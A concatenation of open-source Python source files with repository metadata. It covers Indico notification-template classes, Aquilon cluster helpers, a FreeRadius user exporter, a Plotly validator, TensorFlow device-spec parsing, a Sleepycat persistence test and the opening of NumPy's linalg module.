return self._ccAddrList
def addCCAddr(self,newAddr):
try:
if self._ccAddrList:
pass
except AttributeError:
self._ccAddrList=PersistentList()
ccAddr=newAddr.strip()
if ccAddr!="" and ccAddr not in self._ccAddrList:
self._ccAddrList.append(ccAddr)
def setCCAddrList(self,l):
self.clearCCAddrList()
for addr in l:
self.addCCAddr(addr)
def setCAasCCAddr(self, CAasCCAddr):
self._CAasCCAddr = CAasCCAddr
def getCAasCCAddr(self):
try:
if self._CAasCCAddr:
pass
except AttributeError:
self._CAasCCAddr = False
return self._CAasCCAddr
def clearCCAddrList(self):
self._ccAddrList=PersistentList()
def getFromAddr(self):
try:
return self._fromAddr
except AttributeError:
self._fromAddr = self._owner.getConference().getSupportInfo().getEmail()
return self._fromAddr
def setFromAddr(self, addr):
self._fromAddr = addr
def addToAddr(self,toAddr):
"""
"""
if self.hasToAddr(toAddr.__class__):
return
try:
if self._toAddrGenerator:
pass
except AttributeError, e:
self._toAddrGenerator = Counter()
id = toAddr.getId()
if id == -1:
id = int(self._toAddrGenerator.newCount())
toAddr.includeInTpl(self,id)
self.getToAddrList().append(toAddr)
def removeToAddr(self,toAddr):
"""
"""
if not self.hasToAddr(toAddr.__class__):
return
self.getToAddrList().remove(toAddr)
toAddr.includeInTpl(None,toAddr.getId())
toAddr.delete()
def recoverToAddr(self, toAddr):
self.addToAddr(toAddr)
toAddr.recover()
def getToAddrs(self, abs):
users = []
for toAddr in self.getToAddrList():
users += toAddr.getToAddrList(abs)
return users
def getToAddrList(self):
"""
"""
try:
if self._toAddrs:
pass
except AttributeError, e:
self._toAddrs = PersistentList()
return self._toAddrs
def getToAddrById(self,id):
"""
"""
for toAddr in self.getToAddrList():
if toAddr.getId()==int(id):
return toAddr
return None
def hasToAddr(self,toAddrKlass):
"""Returns True if the TPL contains a "toAddr" which class is "toAddrKlass"
"""
for toAddr in self.getToAddrList():
if toAddr.__class__ == toAddrKlass:
return True
return False
def clearToAddrs(self):
while(len(self.getToAddrList())>0):
self.removeToAddr(self.getToAddrList()[0])
def addCondition(self,cond):
"""
"""
if cond in self._conditions:
return
id = cond.getId()
if id == -1:
id = int(self._condGenerator.newCount())
cond.includeInTpl(self, id)
self._conditions.append(cond)
def removeCondition(self,cond):
"""
"""
if cond not in self._conditions:
return
self._conditions.remove(cond)
cond.delete()
def recoverCondition(self, cond):
self.addCondition(cond)
cond.recover()
def getConditionList(self):
"""
"""
return self._conditions
def getConditionById(self,id):
"""
"""
for cond in self._conditions:
if cond.getId()==int(id):
return cond
return None
def clearConditionList(self):
while(len(self.getConditionList())>0):
self.removeCondition(self.getConditionList()[0])
def satisfies(self,abs):
"""
"""
for cond in self._conditions:
if cond.satisfies(abs):
return True
return False
def parseTplContent(self, content, varList):
# replace the % in order to avoid exceptions
result = content.replace("%", "%%")
# find the vars and make the expressions, it is necessary to do in reverse in order to find the longest tags first
for var in varList:
result = result.replace("{"+var.getName()+"}", "%("+var.getName()+")s")
return result
def parseTplContentUndo(self, content, varList):
# The body content is shown without "%()" and with "%" in instead of "%%" but it is not modified
result = content
for var in varList:
result = result.replace("%("+var.getName()+")s", "{"+var.getName()+"}")
# replace the %% by %
result = result.replace("%%", "%")
return result
def getModifKey( self ):
return self.getConference().getModifKey()
class NotifTplToAddr(Persistent):
    """Base class for notification-template destinations: each subclass
    resolves an abstract into a list of recipients.
    """

    def __init__(self):
        self._tpl=None
        # -1 means "not yet attached to a template" (see
        # NotificationTemplate.addToAddr, which assigns the real id).
        self._id=-1

    def clone(self):
        ntta = NotifTplToAddr()
        return ntta

    def delete(self):
        # Soft delete via the trash can.
        TrashCanManager().add(self)

    def recover(self):
        TrashCanManager().remove(self)

    def includeInTpl(self,newTpl,newId):
        self._tpl=newTpl
        self._id=newId

    def getTpl(self):
        return self._tpl

    def getId(self):
        return self._id

    def getToAddrList(self,absList):
        """
        Return a list with all the recipients for the given abstract;
        subclasses override this (the base returns no recipients).
        """
        return []
class NotifTplToAddrSubmitter(NotifTplToAddr):
    """Destination resolving to the abstract's submitter."""

    def getToAddrList(self, abs):
        """Return the submitter of the abstract as a one-element list."""
        return [abs.getSubmitter()]

    def clone(self):
        """Return a fresh, unattached copy of this destination."""
        return NotifTplToAddrSubmitter()
class NotifTplToAddrPrimaryAuthors(NotifTplToAddr):
    """Destination resolving to every primary author of the abstract."""

    def getToAddrList(self, abs):
        """Return the primary authors of the abstract as a list."""
        return list(abs.getPrimaryAuthorList())

    def clone(self):
        """Return a fresh, unattached copy of this destination."""
        return NotifTplToAddrPrimaryAuthors()
class NotifTplCondition(Persistent):
    """Base class for the conditions attached to a notification template;
    subclasses decide whether a given abstract triggers the template.
    """

    def __init__(self):
        self._tpl=None
        # -1 means "not yet attached" (NotificationTemplate.addCondition
        # assigns the real id).
        self._id=-1

    def clone(self, template):
        # Bug fix: the previous code instantiated the undefined name
        # "NotifyCondition" and called includeInTpl() without the mandatory
        # id argument, raising at runtime.
        con = NotifTplCondition()
        con.includeInTpl(template, self.getId())
        return con

    def delete(self):
        # Soft delete via the trash can.
        TrashCanManager().add(self)

    def recover(self):
        TrashCanManager().remove(self)

    def includeInTpl(self,newTpl,newId):
        self._tpl=newTpl
        self._id=newId

    def getTpl(self):
        return self._tpl

    def getId(self):
        return self._id

    def satisfies(self,abs):
        # Base condition matches everything; subclasses narrow this.
        return True
class NotifTplCondAccepted(NotifTplCondition):
    """Condition met when the abstract is ACCEPTED, optionally restricted
    to a specific track and/or contribution type ("--any--" matches all,
    ""/None/"--none--" match "no track"/"no type").
    """

    def __init__(self,track="--any--",contribType="--any--"):
        NotifTplCondition.__init__(self)
        self._track=track
        self._contribType=contribType

    def clone(self, conference, template):
        # NOTE(review): unlike the sibling conditions this clone never calls
        # includeInTpl, and its (conference, template) signature does not
        # match the single-argument call in NotificationTemplate.clone --
        # confirm which caller is authoritative.
        ntca = NotifTplCondAccepted()
        for newtrack in conference.getTrackList() :
            if newtrack.getTitle() == self.getTrack().getTitle() :
                ntca.setTrack(newtrack)
        for newtype in conference.getContribTypeList() :
            if newtype.getName() == self.getContribType() :
                ntca.setContribType(newtype)
        return ntca

    def setContribType(self, ct="--any--"):
        self._contribType = ct

    def getContribType(self):
        return self._contribType

    def setTrack(self, tr="--any--"):
        self._track = tr

    def getTrack(self):
        # Lazily default for objects persisted before the attribute existed.
        try:
            if self._track:
                pass
        except AttributeError:
            self._track="--any--"
        return self._track

    def _satifiesContribType(self,abs):
        # NOTE: method name keeps its historical typo ("satifies") since it
        # is part of the established interface.
        status=abs.getCurrentStatus()
        if self._contribType=="--any--":
            return True
        else:
            if self._contribType=="" or self._contribType==None or \
                    self._contribType=="--none--":
                return status.getType()=="" or status.getType()==None
            return status.getType()==self._contribType
        # unreachable: both branches above return
        return False

    def _satifiesTrack(self,abs):
        status=abs.getCurrentStatus()
        if self.getTrack()=="--any--":
            return True
        else:
            if self.getTrack()=="" or self.getTrack() is None or \
                    self.getTrack()=="--none--":
                return status.getTrack()=="" or status.getTrack()==None
            return status.getTrack()==self.getTrack()
        # unreachable: both branches above return
        return False

    def satisfies(self,abs):
        # Only accepted abstracts can match, and then both the track and
        # the contribution type restrictions must hold.
        if not isinstance(abs.getCurrentStatus(),AbstractStatusAccepted):
            return False
        else:
            return self._satifiesContribType(abs) and self._satifiesTrack(abs)
class NotifTplCondRejected(NotifTplCondition):
    """Condition met when the abstract is in the REJECTED status."""

    def satisfies(self,abs):
        return isinstance(abs.getCurrentStatus(),AbstractStatusRejected)

    def clone(self, conference, template):
        # Bug fix: includeInTpl() requires the id as well; the previous
        # single-argument call raised TypeError on every clone.
        ntcr = NotifTplCondRejected()
        ntcr.includeInTpl(template, self.getId())
        return ntcr
class NotifTplCondMerged(NotifTplCondition):
    """Condition met when the abstract has been merged into another one."""

    def satisfies(self,abs):
        return isinstance(abs.getCurrentStatus(),AbstractStatusMerged)

    def clone(self, conference, template):
        # Bug fix: the previous code referenced the undefined names
        # newTpl/newId and returned None instead of the new condition.
        ntcm = NotifTplCondMerged()
        ntcm.includeInTpl(template, self.getId())
        return ntcm
class NotificationLog(Persistent):
    """Per-abstract log of the notifications that were sent out."""

    def __init__(self,abstract):
        self._abstract=abstract
        self._entries=PersistentList()

    def getAbstract(self):
        return self._abstract

    def addEntry(self,newEntry):
        # Ignore None and duplicates.
        if newEntry!=None and newEntry not in self._entries:
            self._entries.append(newEntry)

    def getEntryList(self):
        return self._entries

    # The 3 following methods are used only for recovery purposes:

    def removeEntry(self, entry):
        if entry!=None and entry in self._entries:
            self._entries.remove(entry)
            entry.delete()

    def recoverEntry(self, entry):
        self.addEntry(entry)
        entry.recover()

    def clearEntryList(self):
        while len(self.getEntryList()) > 0:
            self.removeEntry(self.getEntryList()[0])
# -----------------------------------------------------------
class NotifLogEntry(Persistent):
    """One entry of a NotificationLog: who triggered which template, when."""

    def __init__(self,responsible,tpl):
        self._setDate(nowutc())
        self._setResponsible(responsible)
        self._setTpl(tpl)

    def _setDate(self,newDate):
        self._date=newDate

    def getDate(self):
        return self._date

    def _setResponsible(self,newResp):
        self._responsible=newResp

    def getResponsible(self):
        return self._responsible

    def _setTpl(self,newTpl):
        self._tpl=newTpl

    def getTpl(self):
        return self._tpl

    def delete(self):
        # Soft delete via the trash can.
        TrashCanManager().add(self)

    def recover(self):
        TrashCanManager().remove(self)
| XeCycle/indico | indico/MaKaC/review.py | Python | gpl-3.0 | 133,200 |
__author__ = 'mglass'
| radiasoft/optics | optics/magnetic_structures/__init__.py | Python | apache-2.0 | 22 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.orm import aliased, object_session
from sqlalchemy.sql import or_
from aquilon.exceptions_ import ArgumentError
from aquilon.aqdb.model import (Archetype, Personality, PersonalityStage,
ClusterLifecycle, Cluster, Host, HardwareEntity,
Location, Building, BuildingPreference)
from aquilon.worker.dbwrappers.branch import get_branch_and_author
def parse_cluster_arguments(session, config, archetype, personality,
                            personality_stage, domain, sandbox, buildstatus,
                            max_members):
    """Validate common cluster-creation arguments and build Cluster kwargs.

    Resolves the archetype and personality (falling back to the configured
    defaults), lifecycle status, branch/sandbox and max_members, raising
    ArgumentError for invalid combinations.
    """
    dbarchetype = Archetype.get_unique(session, archetype, compel=True)
    section = "archetype_" + dbarchetype.name

    if not personality and config.has_option(section, "default_personality"):
        personality = config.get(section, "default_personality")
    if not personality:
        raise ArgumentError("There is no default personality configured "
                            "for {0:l}, please specify --personality."
                            .format(dbarchetype))

    dbpersonality = Personality.get_unique(session, name=personality,
                                           archetype=dbarchetype, compel=True)
    if not dbpersonality.is_cluster:
        raise ArgumentError("%s is not a cluster personality." %
                            personality)

    # Clusters start in "build" state unless told otherwise.
    dbstatus = ClusterLifecycle.get_instance(session, buildstatus or "build")

    if not domain and not sandbox and \
            config.has_option(section, "default_domain"):
        domain = config.get(section, "default_domain")
    if not domain and not sandbox:  # pragma: no cover
        raise ArgumentError("There is no default domain configured for "
                            "{0:l}, please specify --domain or --sandbox."
                            .format(dbarchetype))

    dbbranch, dbauthor = get_branch_and_author(session, domain=domain,
                                               sandbox=sandbox, compel=True)
    if hasattr(dbbranch, "allow_manage") and not dbbranch.allow_manage:
        raise ArgumentError("Adding clusters to {0:l} is not allowed."
                            .format(dbbranch))

    if max_members is None and config.has_option(section, "max_members_default"):
        max_members = config.getint(section, "max_members_default")

    return {
        'personality_stage': dbpersonality.default_stage(personality_stage),
        'branch': dbbranch,
        'sandbox_author': dbauthor,
        'status': dbstatus,
        'max_members': max_members,
    }
def get_clusters_by_locations(session, locations, archetype):
    """
    Return clusters of the given archetype which have members inside all of
    the locations specified.

    The most common use case is looking for clusters which span a given pair
    of buildings, but nothing below is limited to buildings or only two
    locations.
    """
    query = session.query(Cluster)
    query = query.join(PersonalityStage, Personality)
    query = query.filter_by(archetype=archetype)
    query = query.reset_joinpoint()

    # One subquery per required location: the cluster must have at least one
    # member host located at, or underneath, that location.
    for location in locations:
        HWLoc = aliased(Location)
        Parent = aliased(Location)
        subq = session.query(Cluster.id)
        subq = subq.join(Cluster._hosts, Host, HardwareEntity)
        subq = subq.join(HWLoc, HardwareEntity.location)
        subq = subq.outerjoin(Parent, HWLoc.parents)
        subq = subq.filter(or_(HWLoc.id == location.id,
                               Parent.id == location.id))
        query = query.filter(Cluster.id.in_(subq.subquery()))

    # TODO: Add eager-loading options
    return query.all()
def get_cluster_location_preference(dbcluster):
    """Return the preferred location for dbcluster, or None.

    An explicit per-cluster preference wins.  Otherwise, for archetypes with
    building preferences and clusters whose members span exactly two
    buildings, consult the archetype-level BuildingPreference table.
    """
    if dbcluster.preferred_location:
        return dbcluster.preferred_location
    if not dbcluster.archetype.has_building_preferences:
        return None

    buildings = dbcluster.member_locations(location_class=Building)
    if not buildings or len(buildings) != 2:
        return None

    pair = BuildingPreference.ordered_pair(buildings)
    db_pref = BuildingPreference.get_unique(object_session(dbcluster),
                                            building_pair=pair,
                                            archetype=dbcluster.archetype)
    return db_pref.prefer if db_pref else None
def check_cluster_priority_order(dbcluster, config, priority_parameter, priord):
    """Validate a cluster priority value against the allowed range.

    The range comes from the archetype's config section
    (min_priority_order/max_priority_order) when both options are present,
    otherwise from the built-in defaults 1..99.

    Returns a (min, max, source) tuple on success; raises ArgumentError when
    priord falls outside the range.
    """
    section = "archetype_" + dbcluster.archetype.name
    # Bug fix: the previous code caught NoSectionError/NoOptionError, which
    # are never imported in this module and so the except clause itself
    # raised NameError whenever the section/option was missing.  Probe for
    # the options explicitly instead.
    if (config.has_option(section, "min_priority_order") and
            config.has_option(section, "max_priority_order")):
        cpri_min = int(config.get(section, "min_priority_order"))
        cpri_max = int(config.get(section, "max_priority_order"))
        cpri_src = "configured"
    else:
        cpri_min = 1
        cpri_max = 99
        cpri_src = "built-in"
    value = int(priord)
    if value < cpri_min or value > cpri_max:
        raise ArgumentError("Value for {0} ({1}) is outside of the {2} range "
                            "{3}..{4}".format(priority_parameter, priord,
                                              cpri_src, cpri_min, cpri_max))
    return (cpri_min, cpri_max, cpri_src)
| quattor/aquilon | lib/aquilon/worker/dbwrappers/cluster.py | Python | apache-2.0 | 5,714 |
"""
bbss - BBS Student Management
Exports student data for FreeRadius server configuration.
Created on Mon Feb 26 15:08:56 2014
@author: Christian Wichmann
"""
import logging
import os
from itertools import chain
# Public API of this module.
__all__ = ['export_data']
# Module-level logger under the bbss logger hierarchy.
logger = logging.getLogger('bbss.radius')
def export_data(output_file, change_set):
    """
    Write added and changed students from change_set to output_file in
    FreeRadius users-file format: one Cleartext-Password line per student,
    grouped under a comment line per class.
    """
    if os.path.exists(output_file):
        logger.warning('Output file already exists, will be overwritten...')
    template = '{:20}\t\tCleartext-Password := "{}"\n'
    with open(output_file, 'w') as export_file:
        exported = 0
        current_class = ''
        previous_student = None
        students = sorted(chain(change_set.students_added,
                                change_set.students_changed))
        for student in students:
            # A student may appear in both lists; export each one only once
            # (duplicates are adjacent after sorting).
            if student == previous_student:
                continue
            previous_student = student
            exported += 1
            if current_class != student.classname:
                export_file.write('# {}\n'.format(student.classname))
                current_class = student.classname
            export_file.write(template.format(student.generate_user_id().lower(),
                                              student.generate_password()))
    logger.debug('{0} students exported to radius file format.'
                 .format(exported))
| wichmann/bbss | bbss/radius.py | Python | gpl-2.0 | 1,456 |
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self, plotly_name="family", parent_name="waterfall.hoverlabel.font", **kwargs
):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "none"),
no_blank=kwargs.pop("no_blank", True),
strict=kwargs.pop("strict", True),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/waterfall/hoverlabel/font/_family.py | Python | mit | 574 |
from django.contrib import admin
from .models import File
# Expose the File model in the Django admin with the default ModelAdmin.
admin.site.register(File)
"""Class to represent a device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
class Device(object):
  """Represents a Device.

  A device is identified by job, replica, task, device type and device
  index; any field may be left unset, meaning "unspecified".
  """
  def __init__(self, job=None, replica=None, task=None, device_type=None,
               device_index=None):
    """Create a new device object.
    Args:
      job: string. Optional device job name.
      replica: int. Optional replica index.
      task: int. Optional task index.
      device_type: Optional device type string (e.g. "CPU" or "GPU")
      device_index: int. Optional device index. If left
        unspecified, device represents 'any' device_index.
    """
    self.job = job
    self.replica = replica
    self.task = task
    if device_type == "cpu" or device_type == "gpu":
      # For backwards compatibility only, we support lowercase variants of
      # cpu and gpu but turn them into uppercase here.
      self.device_type = device_type.upper()
    else:
      self.device_type = device_type
    self.device_index = device_index
  def _clear(self):
    # Reset all fields to "unspecified" before re-parsing a spec string.
    # Note: sets the private attributes directly, bypassing the setters.
    self._job = None
    self._replica = None
    self._task = None
    self.device_type = None
    self.device_index = None
  @property
  def job(self):
    return self._job
  @job.setter
  def job(self, job):
    # Normalize to str (or None), so ints etc. are accepted.
    if job is not None:
      self._job = str(job)
    else:
      self._job = None
  @property
  def replica(self):
    return self._replica
  @replica.setter
  def replica(self, replica):
    # Normalize to int (or None); raises ValueError on non-numeric input.
    if replica is not None:
      self._replica = int(replica)
    else:
      self._replica = None
  @property
  def task(self):
    return self._task
  @task.setter
  def task(self, task):
    # Normalize to int (or None); raises ValueError on non-numeric input.
    if task is not None:
      self._task = int(task)
    else:
      self._task = None
  def parse_from_string(self, spec):
    """Parse a Device name into its components.
    Args:
      spec: a string of the form
       /job:<name>/replica:<id>/task:<id>/device:CPU:<id>
      or
       /job:<name>/replica:<id>/task:<id>/device:GPU:<id>
      as cpu and gpu are mutually exclusive.
      All entries are optional.
    Returns:
      The Device, for convenience.
    Raises:
      ValueError: if the spec was not valid.
    """
    self._clear()
    # Split "/a:b/c:d:e" into [['', ''], ['a', 'b'], ['c', 'd', 'e']] style
    # pieces and dispatch on the field name / arity of each piece.
    splits = [x.split(":") for x in spec.split("/")]
    for y in splits:
      ly = len(y)
      if y:
        # NOTE(touts): we use the property getters here.
        if ly == 2 and y[0] == "job":
          self.job = y[1]
        elif ly == 2 and y[0] == "replica":
          self.replica = y[1]
        elif ly == 2 and y[0] == "task":
          self.task = y[1]
        elif ((ly == 1 or ly == 2) and
              ((y[0].upper() == "GPU") or (y[0].upper() == "CPU"))):
          # Legacy "/gpu:0" / "/cpu" forms (no "device:" prefix).
          if self.device_type is not None:
            raise ValueError("Cannot specify multiple device types: %s" % spec)
          self.device_type = y[0].upper()
          if ly == 2 and y[1] != "*":
            self.device_index = int(y[1])
        elif ly == 3 and y[0] == "device":
          # Canonical "/device:TYPE:index" form; "*" leaves the index unset.
          if self.device_type is not None:
            raise ValueError("Cannot specify multiple device types: %s" % spec)
          self.device_type = y[1]
          if y[2] != "*":
            self.device_index = int(y[2])
        elif ly and y[0] != "":  # pylint: disable=g-explicit-bool-comparison
          raise ValueError("Unknown attribute: '%s' in '%s'" % (y[0], spec))
    return self
  def merge_from(self, dev):
    """Merge the properties of "dev" into this Device.
    Fields that are set on `dev` overwrite this device's fields; unset
    fields on `dev` are left alone.
    Args:
      dev: a Device.
    """
    if dev.job is not None:
      self.job = dev.job
    if dev.replica is not None:
      self.replica = dev.replica
    if dev.task is not None:
      self.task = dev.task
    if dev.device_type is not None:
      self.device_type = dev.device_type
    if dev.device_index is not None:
      self.device_index = dev.device_index
  def to_string(self):
    """Return a Device specification string.
    Returns:
      a string of the form /job:<name>/replica:<id>/task:<id>/device:CPU:<id>
      or /job:<name>/replica:<id>/task:<id>/device:GPU:<id>, with unset
      fields omitted and an unset device index rendered as "*".
    """
    dev = ""
    if self.job is not None:
      dev += "/job:" + self.job
    if self.replica is not None:
      dev += "/replica:" + str(self.replica)
    if self.task is not None:
      dev += "/task:" + str(self.task)
    if self.device_type is not None:
      device_index_string = "*"
      if self.device_index is not None:
        device_index_string = str(self.device_index)
      dev += "/device:%s:%s" % (self.device_type, device_index_string)
    return dev
def from_string(spec):
  """Construct a Device by parsing a device specification string.
  Args:
    spec: a string of the form
     /job:<name>/replica:<id>/task:<id>/device:CPU:<id>
    or
     /job:<name>/replica:<id>/task:<id>/device:GPU:<id>
    as cpu and gpu are mutually exclusive.
    All entries are optional.
  Returns:
    A Device.
  """
  device = Device()
  return device.parse_from_string(spec)
def check_valid(spec):
  """Check that a device spec is valid.
  Args:
    spec: a string.
  Raises:
    An exception if the spec is invalid.
  """
  # Parsing asserts validity as a side effect; the result is discarded.
  from_string(spec)
def merge_device(spec):
  """Return a device function that merges `spec` into node device specs.
  Partial device specifications combine, and the innermost setting for a
  device field takes precedence. For example:
    with tf.Device(MergeDevice("/device:GPU:0"))
      # Nodes created here have device "/device:GPU:0"
      with tf.Device(MergeDevice("/job:worker")):
        # Nodes created here have device "/job:worker/device:GPU:0"
        with tf.Device(MergeDevice("/device:CPU:0")):
          # Nodes created here have device "/job:worker/device:CPU:0"
          with tf.Device(MergeDevice("/job:ps")):
            # Nodes created here have device "/job:ps/device:CPU:0"
  Args:
    spec: A device or a device spec string (partially) describing the
      device that should be used for all nodes created in the scope of
      the returned device function's with block.
  Returns:
    A device function with the above-described behavior.
  Raises:
    ValueError: if the spec was not valid.
  """
  if not isinstance(spec, Device):
    spec = from_string(spec or "")
  def _device_function(node_def):
    # The node's own (possibly partial) device takes precedence over `spec`.
    merged = copy.copy(spec)
    merged.merge_from(from_string(node_def.device or ""))
    return merged
  return _device_function
| arunhotra/tensorflow | tensorflow/python/framework/device.py | Python | apache-2.0 | 6,508 |
import unittest
import traceback
import shutil
from yarom.configure import Configuration, Configureable
from yarom.data import Data
from yarom.sleepycat import SleepyCatSource
from .base_test import TEST_NS, make_graph
# Probe for a usable Berkeley DB binding: prefer `bsddb`, fall back to
# `bsddb3`.  Sleepycat-backed tests are skipped when neither is importable.
HAS_BSDDB = False
try:
    import bsddb
    print("BSDDB:", bsddb.__file__)
    HAS_BSDDB = True
except ImportError:
    try:
        import bsddb3
        print("BSDDB:", bsddb3.__file__)
        HAS_BSDDB = True
    except ImportError:
        # Bug fix: this was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit; only a missing module should count.
        HAS_BSDDB = False
class DataTest(unittest.TestCase):
    """Tests for Data persistence backed by the Sleepycat RDF store."""

    @unittest.skipIf((not HAS_BSDDB), "Sleepycat requires working bsddb")
    def test_Sleepycat_persistence(self):
        """ Should be able to init without these values """
        c = Configuration()
        fname = 'Sleepycat_store'
        c['rdf.source'] = 'Sleepycat'
        c['rdf.store_conf'] = fname
        c['rdf.namespace'] = TEST_NS
        Configureable.conf = c
        d = Data()
        d.register_source(SleepyCatSource)
        try:
            d.openDatabase()
            g = make_graph(20)
            for x in g:
                d['rdf.graph'].add(x)
            d.closeDatabase()
            # Re-open to prove the triples survived a close/open cycle.
            d.openDatabase()
            self.assertEqual(20, len(list(d['rdf.graph'])))
            d.closeDatabase()
        except Exception:
            # Bug fix: was a bare `except:`; catch only real errors so
            # KeyboardInterrupt/SystemExit still propagate.
            traceback.print_exc()
            self.fail("Bad state")
        finally:
            # Bug fix: the on-disk store used to leak when the test failed
            # (rmtree was only reached on success); always clean it up.
            shutil.rmtree(fname, ignore_errors=True)
| mwatts15/YAROM | tests/test_sleepycat.py | Python | bsd-3-clause | 1,353 |
"""Lite version of scipy.linalg.
Notes
-----
This module is a lite version of the linalg.py module in SciPy which
contains high-level Python interface to the LAPACK library. The lite
version only accesses the following LAPACK functions: dgesv, zgesv,
dgeev, zgeev, dgesdd, zgesdd, dgelsd, zgelsd, dsyevd, zheevd, dgetrf,
zgetrf, dpotrf, zpotrf, dgeqrf, zgeqrf, zungqr, dorgqr.
"""
from __future__ import division, absolute_import, print_function
# Public names re-exported as the numpy.linalg API.
__all__ = ['matrix_power', 'solve', 'tensorsolve', 'tensorinv', 'inv',
           'cholesky', 'eigvals', 'eigvalsh', 'pinv', 'slogdet', 'det',
           'svd', 'eig', 'eigh', 'lstsq', 'norm', 'qr', 'cond', 'matrix_rank',
           'LinAlgError', 'multi_dot']
import warnings
from numpy.core import (
array, asarray, zeros, empty, empty_like, transpose, intc, single, double,
csingle, cdouble, inexact, complexfloating, newaxis, ravel, all, Inf, dot,
add, multiply, sqrt, maximum, fastCopyAndTranspose, sum, isfinite, size,
finfo, errstate, geterrobj, longdouble, moveaxis, amin, amax, product, abs,
broadcast, atleast_2d, intp, asanyarray, isscalar, object_, ones
)
from numpy.core.multiarray import normalize_axis_index
from numpy.lib import triu, asfarray
from numpy.linalg import lapack_lite, _umath_linalg
from numpy.matrixlib.defmatrix import matrix_power
# For Python2/3 compatibility
# NOTE(review): byte literals, presumably used as LAPACK character flags
# (job/uplo arguments) elsewhere in this module — kept as bytes so they can
# be passed to the C layer on both Python 2 and 3.
_N = b'N'
_V = b'V'
_A = b'A'
_S = b'S'
_L = b'L'
# Integer type matching Fortran's default INTEGER for LAPACK calls.
fortran_int = intc
# Error object
class LinAlgError(Exception):
    """
    Generic Python-exception-derived object raised by linalg functions.
    General purpose exception class, derived from Python's exception.Exception
    class, programmatically raised in linalg functions when a Linear
    Algebra-related condition would prevent further correct execution of the
    function.
    Parameters
    ----------
    None
    Examples
    --------
    >>> from numpy import linalg as LA
    >>> LA.inv(np.zeros((2,2)))
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "...linalg.py", line 350,
        in inv return wrap(solve(a, identity(a.shape[0], dtype=a.dtype)))
      File "...linalg.py", line 249,
        in solve
        raise LinAlgError('Singular matrix')
    numpy.linalg.LinAlgError: Singular matrix
    """
    # No extra behavior: the class exists only as a distinct exception type.
    pass
# Dealing with errors in _umath_linalg
# Template extobj passed to the gufuncs: [buffer size, error mask, callback].
_linalg_error_extobj = None
def _determine_error_states():
    # Compute the error mask that routes "invalid" FP errors to a Python
    # callback (so LinAlgError can be raised) while ignoring the rest.
    global _linalg_error_extobj
    errobj = geterrobj()
    bufsize = errobj[0]
    with errstate(invalid='call', over='ignore',
                  divide='ignore', under='ignore'):
        invalid_call_errmask = geterrobj()[1]
    _linalg_error_extobj = [bufsize, invalid_call_errmask, None]
_determine_error_states()
def _raise_linalgerror_singular(err, flag):
    # gufunc error callback: the input matrix was singular.
    raise LinAlgError("Singular matrix")
def _raise_linalgerror_nonposdef(err, flag):
    # gufunc error callback: Cholesky failed (matrix not positive definite).
    raise LinAlgError("Matrix is not positive definite")
def _raise_linalgerror_eigenvalues_nonconvergence(err, flag):
    # gufunc error callback: the eigenvalue iteration failed to converge.
    raise LinAlgError("Eigenvalues did not converge")
def _raise_linalgerror_svd_nonconvergence(err, flag):
    # gufunc error callback: the SVD iteration failed to converge.
    raise LinAlgError("SVD did not converge")
def get_linalg_error_extobj(callback):
    # Copy the module-level template and install `callback` in the
    # error-handler slot (index 2).
    extobj = _linalg_error_extobj[:]
    extobj[2] = callback
    return extobj
def _makearray(a):
new = asarray(a)
wrap = getattr(a, "__array_prepare__", new.__array_wrap__)
return new, wrap
def isComplexType(t):
    # True when `t` is a complex scalar type (subclass of complexfloating).
    return issubclass(t, complexfloating)
# Scalar-type promotion tables: map each supported inexact type to its real
# counterpart and to its complex counterpart.
_real_types_map = {single : single,
                   double : double,
                   csingle : single,
                   cdouble : double}
_complex_types_map = {single : csingle,
                      double : cdouble,
                      csingle : csingle,
                      cdouble : cdouble}
def _realType(t, default=double):
    # Real counterpart of scalar type `t`; `default` for unsupported types.
    return _real_types_map.get(t, default)
def _complexType(t, default=cdouble):
    # Complex counterpart of scalar type `t`; `default` for unsupported types.
    return _complex_types_map.get(t, default)
def _linalgRealType(t):
    """Cast the type t to either double or cdouble."""
    # In the lite version this is always double, regardless of `t`.
    return double
# NOTE(review): this re-definition is byte-for-byte identical to the
# _complex_types_map defined earlier in the module — redundant but harmless.
_complex_types_map = {single : csingle,
                      double : cdouble,
                      csingle : csingle,
                      cdouble : cdouble}
def _commonType(*arrays):
    """Return (computation type, result type) for a set of arrays.

    The computation type is always double or cdouble (the lite LAPACK
    wrappers only support double precision); the result type preserves
    single precision when every input was single.
    """
    # in lite version, use higher precision (always double or cdouble)
    result_type = single
    is_complex = False
    for a in arrays:
        if issubclass(a.dtype.type, inexact):
            if isComplexType(a.dtype.type):
                is_complex = True
            rt = _realType(a.dtype.type, default=None)
            if rt is None:
                # unsupported inexact scalar
                raise TypeError("array type %s is unsupported in linalg" %
                        (a.dtype.name,))
        else:
            # Integer/boolean inputs are promoted to double.
            rt = double
        if rt is double:
            result_type = double
    if is_complex:
        t = cdouble
        result_type = _complex_types_map[result_type]
    else:
        t = double
    return t, result_type
# _fastCopyAndTranspose assumes the input is 2D (as all the calls in here are).
# Short alias used by the wrapper below.
_fastCT = fastCopyAndTranspose
def _to_native_byte_order(*arrays):
ret = []
for arr in arrays:
if arr.dtype.byteorder not in ('=', '|'):
ret.append(asarray(arr, dtype=arr.dtype.newbyteorder('=')))
else:
ret.append(arr)
if len(ret) == 1:
return ret[0]
else:
return ret
def _fastCopyAndTranspose(type, *arrays):
    # Copy-transpose each input, casting to `type` first when necessary;
    # a single input is returned unwrapped, several come back as a tuple.
    out = ()
    for a in arrays:
        src = a if a.dtype.type is type else a.astype(type)
        out += (_fastCT(src),)
